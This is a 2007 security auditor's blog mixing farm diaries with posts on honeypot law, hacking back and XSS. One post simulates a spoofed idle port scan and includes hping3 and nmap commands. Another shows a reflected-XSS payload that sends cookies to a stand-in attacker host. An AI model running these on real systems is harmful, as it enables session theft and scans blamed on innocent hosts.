Saturday, 24 November 2007

A short weekend...

Today is a short weekend.
I was interstate this week with work and only arrived back in Sydney on Saturday. The animals on the farm need to be fed and checked. Fencing is always an issue with cattle. At a minimum I have to do a quick run up to ensure that there are no problems.

At the same time I feed the animals (and even spill a little for the locals from time to time). A little shade helps. The locals are friendly.

The summer is upon us and the fruit trees are ripening. The tamarillos are green but large and will be ready to harvest in a few weeks. They are also called tree tomatoes and have a flavour nothing like a tomato. They are great to cook with.

The citrus are also getting large, though they have a while before they are ripe.

There was no time to plant a crop this year. I had a few medical issues (Hernia for instance) that stopped my efforts at planting.

So the farm will lie fallow for the year and I will prepare for a larger harvest next year.

Such is life. I usually have good crops with zucchini (marrow), pumpkins, squash and sunflowers (canola). I have tried corn, but the wildlife and corn do not mix. Also, keeping cattle out of corn is a task.

Friday, 23 November 2007

IP ID, or How an attacker can blame someone else

Using a tool called hping, an attacker can scan a server without revealing their own IP address. In fact, they can make it appear in the logs that another host performed the scan. (Nmap can also run idle scans, with its -sI option.)
A commonly held belief is that a port scan requires the attacker to give up their real source IP address in order to complete it. The assumption is that using an address other than your own means you cannot get the information back from the system to see which ports are open.
Unfortunately this is not the case.
Using hping, the attacker can run an idle scan. Idle scans make use of predictable IP IDs. Linux, Solaris and OpenBSD have patched the IP ID problem (if the patch is applied). Windows remains vulnerable.
The attacker first scans for an idle host with a sequential, predictable IP ID (this is our kludge; Nmap's documentation calls it a zombie). Once a kludge is found, the attacker sends a packet with the SYN flag set to the target host, spoofing the source address so the packet appears to originate from the kludge.
If the port is open on the target, the target responds with a packet that has the SYN/ACK flags set. This packet is returned to our kludge.
The kludge responds by sending a packet with the RST flag set, stating that it did not send the SYN and does not understand why the host being attacked has sent it a packet. Sending this packet increments the IP ID of the kludge.

If the port is closed, the target sends the kludge a RST instead. The kludge silently drops it and sends nothing, so its IP ID does not move.

The attacker then probes the kludge again (hping's -r option prints the relative IP ID of each reply). Since the attacker's own probes consume one ID each, the kludge's IP ID rises by exactly one between probes if the port was closed, and by two if it was open.
Using this method, the attacker can discover open ports on the target and have another host take the blame. Two caveats: a port that is filtered (the SYN is dropped) looks the same as a closed one, and a kludge that is not truly idle adds noise to the count, so pick one with no other traffic.

What can you do? Randomize your IP ID (or use a separate counter per destination). Unfortunately this means changing the behaviour of the stack, but it is possible. It also means you cannot assume that the host that appears to be scanning you is actually scanning you. So hold off on the active defence!
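The exchange above, as an added simulation that is not part of the original post: an attacker, a kludge whose stack hands out IP IDs from one global counter, and a target that logs the source address it sees. The host names, ports and the 1000 starting counter are constructed for the illustration; nothing is sent on the wire. The real hping and nmap invocations it stands in for are noted in comments and are not executed.

```python
# Added example, not code from the original post. It simulates the idle scan
# the text describes: an attacker, a "kludge" (the post's term for the idle host
# that Nmap's documentation calls a zombie) and a target. Host names and ports
# are constructed for the simulation; nothing is sent on the wire.
#
# The real commands the simulation stands in for (not run here):
#   hping3 -r -S -p 80 KLUDGE                 # -r prints the relative IP ID per reply
#   hping3 -S -a KLUDGE -p PORT TARGET        # -a spoofs the source address
#   nmap -Pn -sI KLUDGE -p PORT TARGET        # Nmap's idle scan
import random


class IdleHost:
    """Kludge whose IP stack hands out IP IDs from one global counter that
    increments by one for every packet it sends (the 2007 Windows behaviour),
    or, with randomize=True, from a random source (the mitigation)."""

    def __init__(self, name, randomize=False, seed=0):
        self.name = name
        self.randomize = randomize
        self._next_id = 1000            # arbitrary starting counter
        self._rng = random.Random(seed)

    def _send(self):
        """Emit one packet and return the IP ID stamped on it."""
        if self.randomize:
            return self._rng.randrange(65536)
        self._next_id = (self._next_id + 1) & 0xFFFF
        return self._next_id

    def receive_unsolicited(self, flags):
        """An unexpected SYN/ACK makes the host answer with a RST (one packet,
        one IP ID consumed); an unexpected RST is silently dropped.
        Returns the IP ID of the packet sent, or None if nothing was sent."""
        if flags == "SYN/ACK":
            return self._send()
        return None


class Target:
    """Server under scan. Its log records the source address it *saw*."""

    def __init__(self, name, open_ports):
        self.name = name
        self.open_ports = set(open_ports)
        self.log = []

    def handle_syn(self, port, src):
        """Answer a SYN with SYN/ACK (open) or RST (closed). The answer goes to
        the spoofed source, i.e. to the kludge, never to the attacker."""
        self.log.append(f"SYN from {src.name} to {self.name}:{port}")
        src.receive_unsolicited("SYN/ACK" if port in self.open_ports else "RST")


def is_predictable(kludge, probes=5):
    """Step 1: probe the candidate kludge with SYN/ACKs and check that the IP ID
    on each RST is exactly one more than the last."""
    ids = [kludge.receive_unsolicited("SYN/ACK") for _ in range(probes)]
    return all((b - a) & 0xFFFF == 1 for a, b in zip(ids, ids[1:]))


def idle_scan_port(kludge, target, port):
    """Steps 2-4: read the kludge's IP ID, send a spoofed SYN, read it again.
    The attacker's own two probes each consume one ID, so the delta is 1 for a
    closed (or filtered) port and 2 for an open one."""
    before = kludge.receive_unsolicited("SYN/ACK")
    target.handle_syn(port, src=kludge)        # source address forged as the kludge
    after = kludge.receive_unsolicited("SYN/ACK")
    delta = (after - before) & 0xFFFF
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"   # a dropped SYN looks the same as a RST
    return "unknown"               # kludge is busy or its IP ID is not sequential


if __name__ == "__main__":
    kludge = IdleHost("kludge.example")
    target = Target("target.example", open_ports={80, 443})
    print("kludge predictable:", is_predictable(kludge))
    for port in (22, 80):
        print(port, idle_scan_port(kludge, target, port))
    print(target.log)  # names the kludge, not the attacker
    print("randomized kludge predictable:",
          is_predictable(IdleHost("k2", randomize=True)))
```

The target's log only ever names the kludge, which is the whole point of the post: the address in your logs is evidence of a packet's claimed source, not of who sent it. Switching the kludge to randomized IP IDs makes the predictability check fail and the deltas meaningless.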

Thursday, 22 November 2007

Attacking back - what is too far?

Bruce Schneier has stated: "A cybersecurity policy that condones both active deterrence and retaliation -- without any judicial determination of wrongdoing -- is attractive, but it's wrongheaded, not least because it ignores the line between war, where those involved are permitted to determine when counterattack is required, and crime, where only impartial third parties (judges and juries) can impose punishment." (in "Vigilantism Is a Poor Response to Cyberattack," WIRED)

So your company is enduring a structured cyber-attack. You are undergoing a distributed system scan from a number of “real” and decoy hosts using Nessus with all the dangerous attacks enabled and a variety of “black” tools. A scan of the hosts will help you determine which of the attacker’s addresses are real and which are spoofed. What do you do?

In responding, remember that a limited number of careful measures, including some simple tests, can be consistent with the rule of law. There are a number of valid tests that may be conducted in order to isolate the real hosts from the spoofed ones; one example is pinging the host to see if it is active. Note that a live reply shows only that the address is in use, not that its owner sent the scan, so combine such tests before acting on the result. This lets you add ingress filters to block the ongoing attack and start to recover your systems.

Remember, though, that there are rarely absolutes and it is likely that an exception to the law may be found. For instance, self-defence and the justification of necessity may apply in extreme cases. Such a case could involve a situation where loss of life was likely if the attack succeeded; hospitals, critical infrastructure and similar situations come to mind. This brings us to the problem with beliefs such as "as this is self-defence you can attack in order to repel the attack" and "you should attack back as this will deter future incidents and let the attacker know you are serious about security".

Although self-defence and necessity are valid justifications, they are limited. If there is a simple way to stop the attack without attacking back, that negates the legality of attacking back entirely. As a number of tests to determine the legitimacy of the attacking addresses may be used to build a filter, the defences of necessity and the like are unlikely to be available.

The key is to seek legal advice prior to the incident. Use it to formulate an incident response process and have it in place before it is needed, not while the incident is happening.

Wednesday, 21 November 2007

Honeynets and the law

Take it too far and you may end up being the criminal!

In investigating the use of a honeypot or honeynet, you need to consider the possibility that your actions (running the system) amount to "an incitement to commit a criminal act". This issue has been addressed before, for instance by Overill (2003):

"In the cyber-defence context, it should be noted that the use of ‘honey-pots’ for enticing or entrapping intruders,[1] in order to determine their identities and monitor their techniques at close range, raises an interesting issue: it is at least possible that the use of a honey-pot might be held to constitute an incitement to commit a criminal act; as such it might render the deployer, rather than the intruder, liable to prosecution." [2]

In the UK's Computer Misuse Act it is stated that;
"On a charge of incitement to commit an offence under this Act the question where the incitement took place is immaterial to the accused’s guilt."

Further issues arise if the attacker uses the honeynet to launch another attack against an external site: you may in effect be "aiding, abetting, counselling or procuring commission of an offence". This was addressed by Hilary E. Pearson in 1996 in "LIABILITY OF INTERNET SERVICE PROVIDERS". These issues are not in fact new or legally unaddressed, as many believe.

Even Richard Salgado, legal counsel to the Honeynet Project and formerly an attorney with the US Department of Justice, has stated on a number of occasions that honeypots are questionable from a legal perspective and that setting one up for the purpose of monitoring an attacker is risky. There are exceptions under the Patriot Act for US law enforcement, but these do not help a company or an individual in the US, just the government.

Pearson (1998), in "Intellectual Property and the Internet. A Comparison of U.K. and U.S. Law" [3], also addressed this issue. In fact, the legal issues raised by honeynets were addressed years before Lance Spitzner came out with "Know Your Enemy". Pearson stated that: "To establish incitement, it must be proved that the defendant knew or believed that the person incited has the necessary mens rea to commit the offence, but as the mens rea for an offence under Section 1 of the Computer Misuse Act is merely that the defendant intends to secure access to a program and knows that such access is unauthorized, this will probably not be too difficult to establish. "

Likewise, Pearson (1998) argued that:
"An alternative approach is to charge the Internet host with aiding, abetting, counselling or procuring commission of an offence. In each case, the defendant must have the intention to do the acts which he knows to be capable of assisting or encouraging the commission of a crime, but does not actually need to have the intent that such crime be committed. "

From this it is easy to see that a honeynet can expose a company to a level of risk it may not want to accept for the gain on offer. In running a honeynet you are effectively stating that you intend to monitor and watch while the attacker commits a crime. That can itself be an offence: you have procured the means and, by keeping the attacker on the honeynet to learn their methods, provided the incitement.

The Fourth Amendment in the US protects against unreasonable searches and seizures and is commonly quoted as a defence to these types of charges. Unfortunately it has little relevance to private honeynets; 18 U.S.C. § 1029, "Fraud and related activity in connection with access devices", does. In particular, the provision to the effect that "if any of the parties engages in any conduct in furtherance of such offence, [they] shall be fined an amount not greater than the amount provided as the maximum fine for such offence under subsection (c)".

So although honeynets are a great learning tool if run correctly, I see little business value in them. The effort to maintain a 24x7 presence to ensure that they do not get out of control, allowing an attacker to "bounce" attacks to a third party (for instance), is too great for the benefits gained. A well-configured IDS in more places is going to offer a better return on investment.

So although I run 2-3 honeynet projects a year myself, there is no way that I would affiliate them with my employer.

I have included some sites if you are interested in reading more about honeynet legalities.

  1. http://articles.techrepublic.com.com/5100-6264_11-5034939.html

  2. http://archives.neohapsis.com/archives/sf/honeypots/2002-q3/0418.html

  3. http://www.ece.gatech.edu/research/labs/nsa/papers/use_of_honeynets.pdf
  • [1] Spitzner, L. (ed.) (2001) Know Your Enemy, Addison-Wesley-Longman; Honeynet Project at http://project.honeynet.org/

  • [2] Overill, Richard E. (2003) "Reacting to cyber-intrusions: the technical, legal and ethical dimensions" J.F.C. 2003, 11(2), 163-167

  • [3] Pearson, Hilary E. (1998) "Intellectual Property and the Internet. A Comparison of U.K. and U.S. Law" The Journal of World Intellectual Property 1 (5), 827-840. doi:10.1111/j.1747-1796.1998.tb00038.x

Tuesday, 20 November 2007

Lying to the auditor is a crime.

In Australia, as in many western nations, lying to the auditor is a criminal offence.

From time to time in an audit I will ask questions of people who do not know me or have not had an audit with me before. One issue that is often misunderstood is that the audit standards (for those of us involved in audits under the Australian Standards, at least) require that all assertions be validated. An auditor cannot just take your word that all is OK. If you make an assertion, we have to test it. On the other hand, if you state that your system is hopelessly inadequate and has few controls, we can take your word on that negative assertion.

So when you state to an auditor, “I patched the firewall on the 3rd of March with the latest patches”. Please tell us the truth as we have to test your assertions and can not just take your word.

Worse than just annoying the auditor, who will go hard on you if you have lied, there is the possibility of criminal action.

If we take a look at the Commonwealth (Australia) Corporations Act:
CORPORATIONS ACT 2001 - SECT 1309
False information etc.

(1) An officer or employee of a corporation who makes available or gives information, or authorises or permits the making available or giving of information, to:

Drilling down, we see that telling the auditor something you know to be false is a crime. Worse than this is what is covered in subsection (2). It states:

(2) An officer or employee of a corporation who makes available or gives information, or authorises or permits the making available or giving of information, to:

What this means is that you can be guilty even if you thought the information was correct but did not yourself verify it. That is, you can be criminally liable for being negligent. When you tell the auditor about your systems, you have to ensure that you supply accurate data.
So why do we need a change control system? I think the answer is self-evident: only the simplest of IT shops has a single person who knows everything that is going on, and even then it is usually what they believe to be the case, not what is fact.

Some of us (auditors) are starting to have a clue. So let's hope that we all start to be more honest in an audit.

Monday, 19 November 2007

Cross Site Scripting (XSS) - You need a victim! (or do you)

A couple of weeks ago I was involved in an audit of a client who had received the all clear from a pen test company here in Australia that had no idea about cross-site scripting (XSS). What is really sad is that they are one of the largest testing firms. [Names have not been included to protect the guilty.]

In their report to a financial services and payment processing company it was stated that:
"A XSS vulnerability was found on the server but no known way to exploit this is known". Well, maybe not known by them!

The machine with the XSS vulnerability was an F5 VPN gateway. It was configured to map through to the payment processes. It had been running unpatched since February, following this test, as it was stated to be secure.

OWASP states that:
"Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it."

This is why I favour audit over pen testing. Even with a clueless auditor, patching would have been validated and the issues would have been fixed months earlier. In this case the company was lucky (we hope). Maybe next time it will not be this way.

You may ask, but how could this be exploited?

The simple answer would be to send an email to the many clients, spoofed to appear to come from the payment processing firm, carrying a link to the real gateway with the attacker's script in the query string. A number of the clients would be likely to follow it. The XSS vulnerability would then reflect that script back from the trusted host, and stolen cookies, internal scanning, access as that user, and more are all possible results.

More simply, however, the F5 had a vulnerability at the same time that would allow an attacker to alter its main logon page. Changing the main login page would allow the attacker to run a harvesting script directly from the web server. They could filter requests and only attack the administrator. Basically, the game was won for the attacker, if they discovered it. Whether anyone did is an open question.
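The reflected-XSS path described above, as an added example that is not code from the original post or from the F5 product: a hypothetical login page reflects the submitted user name into its HTML, the phishing link carries the script on the trusted host's own URL, and the fix is output encoding. The URL, the `user` parameter, the hostnames and the payload are assumptions constructed for the illustration.

```python
# Added example, not code from the original post or from the F5 product. A
# hypothetical login page reflects the submitted user name into its HTML; the
# URL, the 'user' parameter and the hostnames are assumptions constructed for
# the illustration.
import html
from urllib.parse import parse_qs, urlencode, urlsplit

LOGIN_URL = "https://gateway.example/login"   # assumed gateway login page

# Constructed payload: breaks out of the value="" attribute and sends the
# victim's cookie to an attacker-controlled host (attacker.invalid is a
# reserved, non-resolving name).
PAYLOAD = ('"><script>new Image().src="http://attacker.invalid/c?"'
           '+document.cookie</script>')


def render_login_vulnerable(username):
    """Reflects the user name straight into the page: the XSS flaw."""
    return (f'<form method="post"><p>Login failed for {username}</p>'
            f'<input name="user" value="{username}"></form>')


def render_login_fixed(username):
    """Same page with output encoding: every reflected character that has
    meaning in HTML (< > & " ') becomes an entity, so the payload stays text."""
    safe = html.escape(username, quote=True)
    return (f'<form method="post"><p>Login failed for {safe}</p>'
            f'<input name="user" value="{safe}"></form>')


def phishing_link(payload):
    """The link the spoofed e-mail would carry: a genuine URL on the trusted
    gateway, with the attacker's script in the query string."""
    return LOGIN_URL + "?" + urlencode({"user": payload})


def handle_request(url, render):
    """Server side: pull ?user= out of the URL the victim clicked and render."""
    query = parse_qs(urlsplit(url).query)
    return render(query.get("user", [""])[0])


def reflects_active_script(page):
    """Crude check an auditor can script: does an unencoded <script> tag
    come back in the response?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    link = phishing_link(PAYLOAD)
    print(link)
    vuln = handle_request(link, render_login_vulnerable)
    fixed = handle_request(link, render_login_fixed)
    print("vulnerable reflects script:", reflects_active_script(vuln))
    print("fixed reflects script:     ", reflects_active_script(fixed))
```

The vulnerable page hands the browser a live `<script>` element running in the gateway's origin, which is why the cookies it steals belong to the payment service and not to the attacker's site. The encoded version returns the same bytes as harmless text, and the `reflects_active_script` check is the kind of assertion an auditor should be running against every reflected parameter, rather than taking "no known way to exploit" on trust.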

For information on Cross site scripting see:

Sunday, 18 November 2007

Back to Bagnoo

Another weekend
It always seems to be running away from us. Leaving the scene so to speak.

In case you have not guessed, we have cattle on the property. Beef cattle: hamburgers and prime rib just waiting to be processed. (I am not a vegetarian, in case it is not blatantly obvious!)

So these are the cattle (or a SMALL fraction of them) on the property.
The property is not flat by any means, but we like it this way. It is more private, but you can also forget a mobile phone signal.

We (the wife and I) have a little over 520 acres all up. It is about 75% cleared and we have made a small (100 acres or so) timber plantation.

We have Hardwoods, Red Cedar and a number of furniture timbers. These are our retirement (not for a long time, but then timber takes a long time). In case you did not notice, I plan ahead.

We have 3 horses and a donkey. I am not into trail bikes or quads, too noisy and damned dangerous on hill country (i.e. our property).

The horse to the right is "Flame". A bastard mean son of a... at times, but that is how I like him. I will feature the others in later posts.

Flame is a quarter horse. This means he has a penchant for chasing cattle. This is - he does what he wants. If you are on his back, you are along for the ride and he does the work. If he wants you off, he goes head down at a gallop through trees.

He does like the chase though.
On Saturday Lynn and I had a picnic at about 13.30 down near one of the creeks. The one here has a small rain forest (sub tropical) outlook and is recovering nicely (it was logged about a decade prior to our taking over the farm in 2001).

The water is clear and clean and there is a good variety of wildlife.

My Saturday morning when I do not have to go into town for supplies consists of the following:

  • Study (there is always something). I have my LLM to complete by February and I have started psychology as a summer session.
  • Paper writing (I have 2 submissions due at the end of the month for some journals). I have 5 papers totalling 65,000 words due by Christmas. There are also the submissions, and the FBI crime survey is out and needs to be picked on as it is flawed (again).
  • Writing (books; I have 7-8 pages a day to complete to stay on schedule and meet my contracts).
  • Next, I have to feed and water the animals. This takes a few hours. Collecting the eggs also happens at the same time (farm fresh).
  • The task I hate (loathe) is when the pens need cleaning; not a job for the faint-hearted. Let me tell you, moving a dead animal is bad, but mucking out the pens is worse. The fun of a farm...

Some local wild life.
We found an Echidna (or spiny ant eater) while we had the picnic.

This is not the same Echidna that was described by Hesiod as a female monster spawned in a cave, who mothered with her mate Typhoeus (or Typhon) every major monster in the Greek pantheon.

Nor is the animal pictured an escapee from Critters IX; rather, it is an Australian monotreme.

I enjoy having them around. For a start, they eat termites. Echidnas are a natural part of the environment here and they give us an indication that the land is healthy.

Don't for a moment think I am some raving hippy, I plan to be here in 50 years (if I live that long). As a consequence, I believe in the good stewardship of the land. It is all about the long term. In the long term I will also make more money from the land this way.

So there are valid economic arguments for this approach. Most people just want the quick return, though.

General scenes from the property.




At the current time we have been in a high rainfall section of the cycle. Things are green and starting to go well.

This is far better than the last 5 years of drought.

Soon I have to leave again...

Well, until next week...